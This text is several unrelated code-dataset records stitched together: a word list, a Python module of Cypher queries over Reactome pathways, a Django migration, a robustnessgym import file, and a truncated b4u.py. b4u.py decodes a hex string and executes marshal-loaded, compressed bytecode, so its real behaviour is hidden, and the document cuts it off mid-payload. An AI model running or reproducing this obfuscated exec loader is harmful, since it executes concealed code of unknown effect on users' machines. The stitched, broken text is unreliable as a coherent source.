'dashboard', 'foot-rest', 'clasp', 'apartment', 'dugout', 'leg', 'college', 'heavy', 'work', 'litigation', 'raincoat', 'locket', 'procedure', 'seat', 'necklace', 'thigh', 'canoe', 'inlay', 'chess', 'father-in-law', 'effacement', 'basis', 'anklet', 'self', 'call', 'finance', 'dedication', 'spy', 'congressman', 'refrigerator', 'wrinkle', 'mist', 'understanding', 'depression', 'celebration', 'hyena', 'waterfall', 'eyelid', 'variety', 'crowd', 'emery', 'bungalow', 'espadrille', 'fishbone', 'philosophy', 'revolve', 'sycamore', 'toenail', 'harbor', 'bonsai', 'sweater', 'act', 'master', 'checkroom', 'beginner', 'recording', 
'helen', 'portfolio', 'earthquake', 'click', 'gold', 'river', 'spume', 'lung', 'underneath', 'dogsled', 'historian', 'shoehorn', 'metronome', 'shoemaker', 'grain', 'cravat', 'sort', 'bottom', 'shofar', 'chandelier', 'output', 'lettuce', 'lily', 'currency', 'club', 'case', 'hat', 'vineyard', 'astrolabe', 'pad', 'transportation', 'sudan', 'hurricane', 'tulip', 'waterskiing', 'skylight', 'fawn', 'surgeon', 'venezuela', 'thongs', 'accelerator', 'venezuelan', 'eponym', 'geology', 'ridge', 'increase', 'cuff-links', 'wampum', 'vinyl', 'swan', 'spinach', 'interior', 'government', 'shop', 'sourwood', 'marriage', 'story-telling', 'tam', 'shoes', 'greece', 'pith', 'lapdog', 'creche', 'garter', 'revenue', 'sweats', 'need', 'juggernaut', 'midi', 'platinum', 'environment', 'assumption', 'authority', 'delete', 'actress', 'zebrafish', 'elk', 'south', 'vision', 'clover', 'wish', 'weekend', 'expression', 'rubber', 'maraca', 'plain', 'bengal', 'linen', 'video', 'finger', 'orchid', 'underclothes', 'pouch', 'energy', 'eyestrain', 'worklife', 'ordination', 'bunch', 'wednesday', 'watch', 'loggia', 'anger', 'chairperson', 'recorder', 'dealer', 'catacomb', 'alpha', 'pressroom', 'lumber', 'barstool', 'fiber', 'server', 'occupation', 'crocodile', 'cascade', 'flugelhorn', 'motel', 'chest', 'junk', 'wrong', 'mice', 'pansy', 'music-box', 'authorisation', 'thaw', 'clavicle', 'teaching', 'hip', 'gate', 'order', 'curl', 'hedgehog', 'sack', 'roadway', 'job', 'campanile', 'baby', 'refectory', 'candy', 'laura', 'sprinter', 'tremor', 'owl', 'ladder', 'galley', 'gladiolus', 'line', 'schooner', 'frown', 'fencing', 'wealth', 'client', 'ad', 'employ', 'marksman', 'toast', 'cornet', 'hall', 'chop', 'latency', 'councilman', 'opportunity', 'pneumonia', 'english', 'british', 'deployment', 'son', 'oeuvre', 'bootee', 'oyster', 'bowl', 'index', 'box', 'dirt', 'insulation', 'cloakroom', 'oncology', 'shoe-horn', 'clarinet', 'radish', 'fedelini', 'pusher', 'law', 'balcony', 'clogs', 'sled', 'corn', 'hand-holding', 
'motion', 'korea', 'elixir', 'sturgeon', 'coinsurance', 'xylophone', 'handmaiden', 'big-rig', 'weird', 'settler', 'bite', 'russia', 'math', 'hostel', 'culvert', 'project', 'hope', 'banjo', 'frock', 'hygienic', 'miscarriage', 'mary', 'verve', 'debt', 'lounge', 'soybean', 'table', 'steak', 'building', 'titanium', 'caution', 'sock', 'route', 'sepal', 'solution', 'shadow', 'kind', 'e-book', 'step-brother', 'leprosy', 'squatter', 'interest', 'yak', 'larch', 'skulduggery', 'tom-tom', 'sheath', 'harpooner', 'linseed', 'astrology', 'nurse', 'tale', 'purse', 'router', 'kazoo', 'brain', 'wallet', 'lunch', 'speaker', 'geyser', 'tambour', 'skate', 'young', 'windshield', 'yarn', 'uzbekistan', 'snowmobiling', 'caddy', 'macrame', 'theater', 'turban', 'babies', 'anything', 'guilty', 'best-seller', 'america', 'bandanna', 'novel', 'crab', 'level', 'spray', 'knife-edge', 'kettledrum', 'billboard', 'thing', 'meet', 'poof', 'pimp', 'monster', 'redesign', 'scissors', 'homogenate', 'morning', 'pain', 'leo', 'feet', 'light', 'quantity', 'big', 'railway', 'mantel', 'starter', 'cyst', 'vibe', 'hood', 'demur', 'pharmacopoeia', 'tub', 'obi', 'sewer', 'rhinoceros', 'toothpick', 'ability', 'sledge', 'technician', 'gun', 'couch', 'complaint', 'ironclad', 'income', 'stamp', 'factory', 'hobby', 'anatomy', 'booty', 'event', 'margaret', 'colon', 'red', 'volume', 'psychoanalyst', 'asterisk', 'footnote', 'dilapidation', 'eyelids', 'massage', 'salesman', 'opera', 'pew', 'brandy', 'loincloth', 'fringe', 'gear', 'algebra', 'aries', 'cupcake', 'good-bye', 'wastebasket', 'mixer', 'kick', 'twine', 'spike', 'grease', 'bower', 'particular', 'tuesday', 'whale', 'achiever', 'buy', 'ring', 'noodle', 'sprout', 'wet-bar', 'tiara', 'piss', 'attachment', 'oil', 'council', 'minor', 'fertilizer', 'style', 'guide', 'candidate', 'danger', 'aquifer', 'phone', 'sunglasses', 'foray', 'towel', 'cheque', 'hamburger', 'hotel', 'men', 'blizzard', 'notebook', 'reflection', 'text', 'dromedary', 'jacket', 'bandolier', 
'trapezium', 'cathedral', 'figurine', 'pencil', 'thought', 'thursday', 'thunderbolt', 'buyer', 'web', 'cost', 'confusion', 'diving', 'azimuth', 'primate', 'island', 'coil', 'turn', 'cicada', 'locomotive', 'nicety', 'flight', 'hill', 'exposition', 'keyboard', 'pedestrian', 'innervation', 'blueberry', 'plastic', 'range', 'reality', 'achieve', 'hearthside', 'representative', 'trim', 'digestion', 'feedback', 'pier', 'breastplate', 'structure', 'atrium', 'doubt', 'fusarium', 'hour', 'fortune', 'netsuke', 'clank', 'lier', 'force', 'belfry', 'hardware', 'suck', 'channel', 'distance', 'weeder', 'claus', 'broker', 'fortnight', 'eel', 'icon', 'shears', 'latex', 'chick', 'method', 'soccer', 'expansion', 'church']
| 3,726.8 | 10,686 | 0.623001 | 1,777 | 18,634 | 6.532921 | 0.919527 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000059 | 0.094129 | 18,634 | 4 | 10,687 | 4,658.5 | 0.687678 | 0.000644 | 0 | 0 | 0 | 0 | 0.623577 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.5 | 0.5 | 0 | 0.5 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 7 |
ba35a5f750d673fdc5f080371ce53e475fc373dc | 11,431 | py | Python | src/Python/queries.py | PathwayAnalysisPlatform/ProteoformNetworks | 3d31e5b3cb4abc45e6419fa982c08b3dc5c2624e | [
"Apache-2.0"
] | 1 | 2019-08-16T12:40:14.000Z | 2019-08-16T12:40:14.000Z | src/Python/queries.py | PathwayAnalysisPlatform/ProteoformNetworks | 3d31e5b3cb4abc45e6419fa982c08b3dc5c2624e | [
"Apache-2.0"
] | 9 | 2019-08-16T07:33:33.000Z | 2022-03-04T22:20:02.000Z | src/Python/queries.py | PathwayAnalysisPlatform/ProteoformNetworks | 3d31e5b3cb4abc45e6419fa982c08b3dc5c2624e | [
"Apache-2.0"
] | 1 | 2022-02-21T17:42:48.000Z | 2022-02-21T17:42:48.000Z | from config import proteoforms, genes, proteins, sm
# Cypher queries (one per granularity level from `config`) returning, for
# every human ('Homo sapiens') Reactome pathway, each reaction's physical
# entity participants together with their role in the reaction.
# The `Id` column is the level-specific identifier: gene name, UniProt
# accession, proteoform (accession + collected PTMs), or small-molecule name.
QUERIES_PARTICIPANTS = {
    genes: """
MATCH (pw:Pathway{speciesName:'Homo sapiens'})-[:hasEvent]->(rle:ReactionLikeEvent{speciesName:'Homo sapiens'}),
p = (rle)-[:input|output|catalystActivity|physicalEntity|regulatedBy|regulator|hasComponent|hasMember|hasCandidate*]->(pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'}),
(pe)-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
RETURN DISTINCT pw.stId as Pathway, rle.stId as Reaction, pe.stId as Entity, pe.displayName as Name,
last(labels(pe)) as Type, head(re.geneName) as Id, re.databaseName AS Database,
head([scores IN relationships(p) | type(scores)]) as Role
ORDER BY Pathway, Reaction, Role, Type
""",
    proteins: """
MATCH (pw:Pathway{speciesName:'Homo sapiens'})-[:hasEvent]->(rle:ReactionLikeEvent{speciesName:'Homo sapiens'}),
p = (rle)-[:input|output|catalystActivity|physicalEntity|regulatedBy|regulator|hasComponent|hasMember|hasCandidate*]->(pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'}),
(pe)-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
RETURN DISTINCT pw.stId as Pathway, rle.stId as Reaction, pe.stId as Entity, pe.displayName as Name,
last(labels(pe)) as Type, re.identifier as Id, head(re.geneName) as PrevId,
re.databaseName AS Database, head([scores IN relationships(p) | type(scores)]) as Role
ORDER BY Pathway, Reaction, Role, Type
""",
    # Proteoform level: OPTIONAL MATCH keeps unmodified proteins; PTMs are
    # collected (sorted by type/coordinate) and appended to the accession,
    # preferring the isoform (variant) identifier when present.
    proteoforms: """
MATCH (pw:Pathway{speciesName:'Homo sapiens'})-[:hasEvent]->(rle:ReactionLikeEvent{speciesName:'Homo sapiens'}),
p = (rle)-[:input|output|catalystActivity|physicalEntity|regulatedBy|regulator|hasComponent|hasMember|hasCandidate*]->(pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'}),
(pe)-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
WITH DISTINCT pw.stId as Pathway, rle.stId as Reaction, pe, re, head([x IN relationships(p) | type(x)]) as Role
OPTIONAL MATCH (pe)-[:hasModifiedResidue]->(tm:TranslationalModification)-[:psiMod]->(mod:PsiMod)
WITH DISTINCT Pathway, Reaction, pe.stId as Entity, pe.displayName as Name, last(labels(pe)) as Type,
CASE
WHEN re.variantIdentifier IS NOT NULL THEN re.variantIdentifier
ELSE re.identifier
END as Id, re.identifier as PrevId,
mod.identifier as ptm_type, tm.coordinate as ptm_coordinate, re.databaseName as Database, Role
ORDER BY ptm_type, ptm_coordinate
WITH DISTINCT Pathway, Reaction, Entity, Name, Type, Id, PrevId,
COLLECT(ptm_type + ":" + CASE WHEN ptm_coordinate IS NOT NULL THEN ptm_coordinate ELSE "null" END) AS ptms,
Database, Role
RETURN DISTINCT Pathway, Reaction, Entity, Name, Type, (Id+ptms) as Id, PrevId, Database, Role
ORDER BY Pathway, Reaction, Role
""",
    # Small molecules: Id is prefixed "sm_"; UniqueId additionally embeds the
    # reaction stId so the same molecule in different reactions stays distinct.
    sm: """
MATCH (pw:Pathway{speciesName:'Homo sapiens'})-[:hasEvent]->(rle:ReactionLikeEvent{speciesName:'Homo sapiens'}),
p = (rle)-[:input|output|catalystActivity|physicalEntity|regulatedBy|regulator|hasComponent|hasMember|hasCandidate*]->(pe:SimpleEntity),
(pe)-[:referenceEntity]->(re:ReferenceEntity)-[:referenceDatabase]->(rd:ReferenceDatabase)
RETURN DISTINCT pw.stId as Pathway, rle.stId as Reaction, pe.stId as Entity, pe.displayName as Name,
last(labels(pe)) as Type, "sm_" + pe.displayName as Id, "sm_" + rle.stId + "_" + pe.displayName as UniqueId,
rd.displayName AS Database,
head([scores IN relationships(p) | type(scores)]) as Role
ORDER BY Pathway, Reaction, Role, Type
"""
}
def get_query_participants_by_pathway(level, pathway="", reaction=""):
    """Build the participants query for ``level``, optionally narrowed.

    Args:
        level: one of the granularity keys of ``QUERIES_PARTICIPANTS``
            (genes / proteins / proteoforms / sm from ``config``).
        pathway: if non-empty, restrict the query to this pathway stId.
        reaction: if non-empty, restrict the query to this reaction stId.

    Returns:
        The Cypher query string with the stId filters spliced into the
        Pathway / ReactionLikeEvent node patterns.

    Raises:
        KeyError: if ``level`` is not a known granularity level.
    """
    query = QUERIES_PARTICIPANTS[level]
    # NOTE(review): pathway/reaction are interpolated directly into the
    # Cypher text; callers must pass trusted Reactome stIds, not user input.
    if pathway:
        query = query.replace(
            "Pathway{speciesName:'Homo sapiens'}",
            f"Pathway{{speciesName:'Homo sapiens', stId:'{pathway}'}}")
    if reaction:
        query = query.replace(
            "ReactionLikeEvent{speciesName:'Homo sapiens'}",
            f"ReactionLikeEvent{{speciesName:'Homo sapiens', stId:'{reaction}'}}")
    return query
# Cypher queries (one per granularity level from `config`) listing the
# accessioned / small-molecule components of every human Reactome Complex,
# traversing hasComponent/hasMember/hasCandidate to any depth.
QUERIES_COMPONENTS = {
    genes: """
MATCH (c:Complex{speciesName:'Homo sapiens'})-[:hasComponent|hasMember|hasCandidate*]->(pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'})-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
RETURN DISTINCT c.stId as Complex, pe.stId AS Entity, pe.displayName AS Name, last(labels(pe)) as Type, head(re.geneName) as Id
ORDER BY Complex
""",
    proteins: """
MATCH (c:Complex{speciesName:'Homo sapiens'})-[:hasComponent|hasMember|hasCandidate*]->(pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'})-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
RETURN DISTINCT c.stId as Complex, pe.stId AS Entity, pe.displayName AS Name, last(labels(pe)) as Type, re.identifier as Id, head(re.geneName) as PrevId
ORDER BY Complex
""",
    # Proteoform level: OPTIONAL MATCH keeps unmodified proteins; PTMs are
    # collected per entity and appended to the (variant-preferring) accession.
    proteoforms: """
MATCH (c:Complex{speciesName:'Homo sapiens'})-[:hasComponent|hasMember|hasCandidate*]->(pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'})-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
WITH DISTINCT c, pe, last(labels(pe)) as Type, re
OPTIONAL MATCH (pe)-[:hasModifiedResidue]->(tm:TranslationalModification)-[:psiMod]->(mod:PsiMod)
WITH DISTINCT c.stId as Complex,
pe.stId AS Entity,
pe.displayName AS Name,
Type,
CASE
WHEN re.variantIdentifier IS NOT NULL THEN re.variantIdentifier
ELSE re.identifier
END as Id, re.identifier as PrevId,
mod.identifier as ptm_type,
tm.coordinate as ptm_coordinate
ORDER BY ptm_type, ptm_coordinate
WITH DISTINCT Complex, Entity, Name, Type, Id, PrevId,
COLLECT(
ptm_type + ":" + CASE WHEN ptm_coordinate IS NOT NULL THEN ptm_coordinate ELSE "null" END
) AS ptms
RETURN DISTINCT Complex, Entity, Name, Type, (Id+ptms) as Id, PrevId
ORDER BY Complex
""",
    # Small molecules: Id prefixed "sm_"; UniqueId embeds the complex stId
    # so the same molecule in different complexes stays distinct.
    sm: """
MATCH (c:Complex{speciesName:'Homo sapiens'})-[:hasComponent|hasMember|hasCandidate*]->(pe:SimpleEntity)
RETURN DISTINCT c.stId as Complex, pe.stId AS Entity, pe.displayName as Name, last(labels(pe)) as Type, "sm_" + pe.displayName as Id, "sm_" + c.stId + "_" + pe.displayName as UniqueId
ORDER BY Complex
"""
}
# All Complexes reachable as participants of any human reaction.
# NOTE(review): despite the name, no pathway/reaction filter is applied here —
# presumably callers splice one in, as get_query_participants_by_pathway does;
# verify against usage.
QUERY_GET_COMPLEXES_BY_PATHWAY_OR_REACTION = """
MATCH (p:Pathway{speciesName:'Homo sapiens'})-[:hasEvent*]->(r:ReactionLikeEvent{speciesName:"Homo sapiens"})-[:input|output|catalystActivity|physicalEntity|regulatedBy|regulator*]->(pe:Complex)
RETURN DISTINCT pe.stId as Complex, pe.displayName AS ComplexName, labels(pe)
"""
# Reactions whose participant set contains exactly one entity type, and that
# type is EntityWithAccessionedSequence (proteins only, no small molecules).
QUERY_REACTIONS_ONLY_WITH_EWAS_PARTICIPANTS = """
MATCH p = (rle:ReactionLikeEvent{speciesName:"Homo sapiens"})-[:input|output|catalystActivity|physicalEntity|regulatedBy|regulator|hasComponent|hasMember|hasCandidate*]->(pe:PhysicalEntity)
WITH DISTINCT rle.stId as Reaction, collect(pe.stId) as Entity, collect(last(labels(pe))) as Type, collect( pe.displayName) as names
WHERE size(Type) = 1 AND "EntityWithAccessionedSequence" in Type
RETURN Reaction, Entity, Type, names
"""
# Reactions whose participants are exclusively SimpleEntity (small molecules).
QUERY_REACTIONS_WITH_ONLY_SMALL_MOLECULE_PARTICIPANTS = """
MATCH p = (rle:ReactionLikeEvent{speciesName:"Homo sapiens"})-[:input|output|catalystActivity|physicalEntity|regulatedBy|regulator|hasComponent|hasMember|hasCandidate*]->(pe:PhysicalEntity)
WITH DISTINCT rle.stId as Reaction, collect(DISTINCT pe.stId) as Entity, collect(DISTINCT last(labels(pe))) as Type, collect(DISTINCT pe.displayName) as names
WHERE size(Type) <= 1 AND "SimpleEntity" in Type
RETURN Reaction, Entity, Type, names
"""
# Every distinct proteoform identifier (accession/isoform + collected PTMs)
# across all human EWAS entities.
QUERY_GET_ALL_PROTEOFORMS = """
MATCH (pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'})-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
WITH DISTINCT pe, re
OPTIONAL MATCH (pe)-[:hasModifiedResidue]->(tm:TranslationalModification)-[:psiMod]->(mod:PsiMod)
WITH DISTINCT pe.stId as Entity,
pe.displayName as Name,
CASE WHEN re.variantIdentifier IS NOT NULL THEN re.variantIdentifier ELSE re.identifier END as Id,
mod.identifier as ptm_type,
tm.coordinate as ptm_coordinate
ORDER BY ptm_type, ptm_coordinate
WITH DISTINCT Entity, Name, Id, COLLECT(ptm_type + ":" + CASE WHEN ptm_coordinate IS NOT NULL THEN ptm_coordinate ELSE "null" END) AS ptms
WITH DISTINCT Entity, Name, (Id+ptms) as Id
RETURN DISTINCT Id ORDER BY Id
"""
# Map each UniProt protein accession to the list of proteoforms annotated
# for it in Reactome.
QUERY_GET_PROTEOFORMS_OF_EACH_PROTEIN = """
MATCH (pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'})-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
WITH DISTINCT pe, re
OPTIONAL MATCH (pe)-[:hasModifiedResidue]->(tm:TranslationalModification)-[:psiMod]->(mod:PsiMod)
WITH DISTINCT pe.stId as Entity,
pe.displayName as Name,
re.identifier as Protein,
CASE WHEN re.variantIdentifier IS NOT NULL THEN re.variantIdentifier ELSE re.identifier END as Id,
mod.identifier as ptm_type,
tm.coordinate as ptm_coordinate
ORDER BY Protein, ptm_type, ptm_coordinate
WITH DISTINCT Entity, Name, Protein, Id, COLLECT(ptm_type + ":" + CASE WHEN ptm_coordinate IS NOT NULL THEN ptm_coordinate ELSE "null" END) AS ptms
WITH DISTINCT Entity, Name, Protein, (Id+ptms) as Proteoform ORDER BY Proteoform
WITH DISTINCT Protein, COLLECT(DISTINCT Proteoform) as Proteoforms ORDER By Protein
RETURN DISTINCT Protein, Proteoforms
"""
# Same as the previous query, but keeps only proteins with more than one
# proteoform, sorted by proteoform count (descending).
QUERY_GET_NUM_PROTEOFORMS_PER_PROTEIN = """
MATCH (pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'})-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
WITH DISTINCT pe, re
OPTIONAL MATCH (pe)-[:hasModifiedResidue]->(tm:TranslationalModification)-[:psiMod]->(mod:PsiMod)
WITH DISTINCT pe.stId as Entity,
pe.displayName as Name,
re.identifier as Protein,
CASE WHEN re.variantIdentifier IS NOT NULL THEN re.variantIdentifier ELSE re.identifier END as Id,
mod.identifier as ptm_type,
tm.coordinate as ptm_coordinate
ORDER BY Protein, ptm_type, ptm_coordinate
WITH DISTINCT Entity, Name, Protein, Id, COLLECT(ptm_type + ":" + CASE WHEN ptm_coordinate IS NOT NULL THEN ptm_coordinate ELSE "null" END) AS ptms
WITH DISTINCT Entity, Name, Protein, (Id+ptms) as Proteoform ORDER BY Proteoform
WITH DISTINCT Protein, COLLECT(DISTINCT Proteoform) as Proteoforms ORDER By Protein
WITH Protein, Proteoforms, size(Proteoforms) as NumProteoforms
WHERE NumProteoforms > 1
RETURN DISTINCT Protein, Proteoforms, NumProteoforms ORDER BY NumProteoforms DESC
"""
# Pathways containing a given protein.
# NOTE(review): the UniProt accession "P04049" (RAF1) is hard-coded here even
# though the constant's name is generic — callers presumably .replace() the
# identifier, as done for the pathway/reaction filters above; confirm.
QUERY_GET_PATHWAYS_BY_PROTEIN = """
MATCH (p:Pathway{speciesName:"Homo sapiens"})-[:hasEvent*]->(rle:ReactionLikeEvent{speciesName:"Homo sapiens"}),
(rle)-[:input|output|catalystActivity|physicalEntity|regulatedBy|regulator|hasComponent|hasMember|hasCandidate*]->(pe:PhysicalEntity),
(pe)-[:referenceEntity]->(re:ReferenceEntity{identifier:"P04049", databaseName:"UniProt"})
RETURN DISTINCT p.stId AS PathwayId, p.displayName AS Pathway, re.identifier AS Identifier
ORDER BY PathwayId, Identifier
"""
| 62.464481 | 218 | 0.711574 | 1,356 | 11,431 | 5.938053 | 0.088496 | 0.05775 | 0.084699 | 0.022603 | 0.828117 | 0.811972 | 0.797069 | 0.785768 | 0.762295 | 0.753105 | 0 | 0.001052 | 0.168402 | 11,431 | 182 | 219 | 62.807692 | 0.845992 | 0 | 0 | 0.597633 | 0 | 0.230769 | 0.918467 | 0.335491 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005917 | false | 0 | 0.005917 | 0 | 0.017751 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ba43a3b8b8e7aa116e22f1e3b33a65fbfcc8aa0b | 2,352 | py | Python | business_register/migrations/0016_auto_20200626_1000.py | OlexandrTopuzov/Data_converter | 0ac2319ccaae790af35ab2202724c65d83d32ecc | [
"MIT"
] | null | null | null | business_register/migrations/0016_auto_20200626_1000.py | OlexandrTopuzov/Data_converter | 0ac2319ccaae790af35ab2202724c65d83d32ecc | [
"MIT"
] | null | null | null | business_register/migrations/0016_auto_20200626_1000.py | OlexandrTopuzov/Data_converter | 0ac2319ccaae790af35ab2202724c65d83d32ecc | [
"MIT"
] | null | null | null | # Generated by Django 3.0.7 on 2020-06-26 10:00
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration (Django 3.0.7, 2020-06-26).

    Alters CharField options (max_length / null / db_index) on the
    ExchangeDataFop, Fop, and HistoricalFop models of business_register.
    Do not edit by hand beyond what Django's migration framework expects.
    """
    # Must be applied after the historical-founder migration it builds on.
    dependencies = [
        ('business_register', '0015_historicalfounderfull'),
    ]
    # All operations are independent AlterField changes; Django applies
    # them in order within a single migration transaction (on backends
    # that support transactional DDL).
    operations = [
        migrations.AlterField(
            model_name='exchangedatafop',
            name='end_number',
            field=models.CharField(max_length=30, null=True),
        ),
        migrations.AlterField(
            model_name='exchangedatafop',
            name='start_number',
            field=models.CharField(max_length=30, null=True),
        ),
        migrations.AlterField(
            model_name='fop',
            name='contact_info',
            field=models.CharField(max_length=200, null=True),
        ),
        migrations.AlterField(
            model_name='fop',
            name='estate_manager',
            field=models.CharField(max_length=125, null=True),
        ),
        migrations.AlterField(
            model_name='fop',
            name='hash_code',
            field=models.CharField(db_index=True, max_length=600),
        ),
        migrations.AlterField(
            model_name='fop',
            name='termination_cancel_info',
            field=models.CharField(max_length=275, null=True),
        ),
        migrations.AlterField(
            model_name='fop',
            name='vp_dates',
            field=models.CharField(max_length=140, null=True),
        ),
        migrations.AlterField(
            model_name='historicalfop',
            name='contact_info',
            field=models.CharField(max_length=200, null=True),
        ),
        migrations.AlterField(
            model_name='historicalfop',
            name='estate_manager',
            field=models.CharField(max_length=125, null=True),
        ),
        migrations.AlterField(
            model_name='historicalfop',
            name='hash_code',
            field=models.CharField(db_index=True, max_length=600),
        ),
        migrations.AlterField(
            model_name='historicalfop',
            name='termination_cancel_info',
            field=models.CharField(max_length=275, null=True),
        ),
        migrations.AlterField(
            model_name='historicalfop',
            name='vp_dates',
            field=models.CharField(max_length=140, null=True),
        ),
    ]
| 31.783784 | 66 | 0.568027 | 224 | 2,352 | 5.776786 | 0.254464 | 0.185471 | 0.231839 | 0.268934 | 0.867079 | 0.867079 | 0.802937 | 0.802937 | 0.731066 | 0.731066 | 0 | 0.033084 | 0.318878 | 2,352 | 73 | 67 | 32.219178 | 0.774657 | 0.019133 | 0 | 0.865672 | 1 | 0 | 0.133189 | 0.031236 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.014925 | 0 | 0.059701 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
ba5e739bd09fb3c3ed6a3e87d93a1feef85c0b7e | 152 | py | Python | robustnessgym/slicebuilders/attacks/__init__.py | jessevig/robustness-gym | 37fa9f04dc62638b78cf05b930c8034eb7dcb3e7 | [
"Apache-2.0"
] | 399 | 2021-01-13T17:16:53.000Z | 2022-03-31T11:55:22.000Z | robustnessgym/slicebuilders/attacks/__init__.py | jessevig/robustness-gym | 37fa9f04dc62638b78cf05b930c8034eb7dcb3e7 | [
"Apache-2.0"
] | 22 | 2021-01-09T02:37:44.000Z | 2021-08-29T16:38:49.000Z | robustnessgym/slicebuilders/attacks/__init__.py | jessevig/robustness-gym | 37fa9f04dc62638b78cf05b930c8034eb7dcb3e7 | [
"Apache-2.0"
] | 34 | 2021-01-14T08:02:00.000Z | 2021-11-22T03:54:53.000Z | from robustnessgym.slicebuilders.attacks.morpheus import Morpheus # noqa
from robustnessgym.slicebuilders.attacks.textattack import TextAttack # noqa
| 50.666667 | 77 | 0.855263 | 16 | 152 | 8.125 | 0.5 | 0.261538 | 0.461538 | 0.569231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092105 | 152 | 2 | 78 | 76 | 0.942029 | 0.059211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
ba8af65170b82123703182381bc671985eec432d | 13,124 | py | Python | b4u.py | sillytuktuk2020/b4u | 15b87e4d92f99ac7208e2251dc133731e94d5b31 | [
"Apache-2.0"
] | null | null | null | b4u.py | sillytuktuk2020/b4u | 15b87e4d92f99ac7208e2251dc133731e94d5b31 | [
"Apache-2.0"
] | null | null | null | b4u.py | sillytuktuk2020/b4u | 15b87e4d92f99ac7208e2251dc133731e94d5b31 | [
"Apache-2.0"
] | null | null | null | # Auther : AKSHAY DHAWAN
# GitHub : https://github.com/sillytuktuk2020
# instagram decent_deep_raadhe
import base64
exec(base64.b16decode('2320436F6D70696C6564204279203A2042696E79616D696E0A2320476974487562203A2068747470733A2F2F6769746875622E636F6D2F42696E79616D696E2D62696E6E690A2320596F7554756265204368616E6E656C203A20547269636B2050726F6F660A696D706F7274206D61727368616C0A65786563286D61727368616C2E6C6F6164732827635C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830335C7830305C7830305C783030405C7830305C7830305C78303073215C7830305C7830305C783030645C7830305C783030645C7830315C7830306C5C7830305C7830305A5C7830305C783030655C7830305C7830306A5C7830315C783030645C7830325C7830305C7838335C7830315C783030645C7830315C7830305C78303455645C7830315C78303053285C7830335C7830305C7830305C783030695C7866665C7866665C7866665C7866664E73225C7830385C7830305C783030785C7839635C786335585C786539725C7865335C7862385C7831315C7866652D3E5C7830355C7839365C7861395A525C786231445C7838395C7862343C3E264C5C7863615C7865335C7866315C786563385C7865625C783139393E325C7839355C7862325D2C5C7838385C783834445C786334245C7863315C7830305C786130255C7863647A5C783966213F5C7866337E795C783932345C786330435C786132645C783866775C786237525C744B255C7839325C7864645C7865385C7830335C7831665C7831615C7864645C724A5C7862653C325C7831305C5C345C7863645C7831395C7839375C7838385C7838395C783965585C7838615C7839655C786134295C78653945585C7831325C7866645C786330715C7831365C7862315C7862345C783137635C7831315C27745C7864325C7865335C7861345C27634E70445C786233595C7865665C7865665C783832655C7862645C7838325C275C7838615C783131325C786636405C7838397A5C7839615C7831315C78393963217A295C74635C7839635C7864315C7861665C7861305C7838335C7866635C78613320425C6E6D6C5C786361595C7838615C786432225C783931345C7865372C24425C783830265C27672C5C7861395C7864645C7862385C7864365C7866612F5C7838305C7862325C7831615F6B705C78633822245C7862395C7861342C5C7831335C7866355C7866305C7831335C7839366524545C786134535C7863655C7831395F5C786233515C7864625C786166475C7862655C7865336C2E5C783038374A5C7831645C7865384C535C786235505C745C7830335C7831335C7830655C7863635F5C7839325C7864345C786236725C7839617B5C7838386
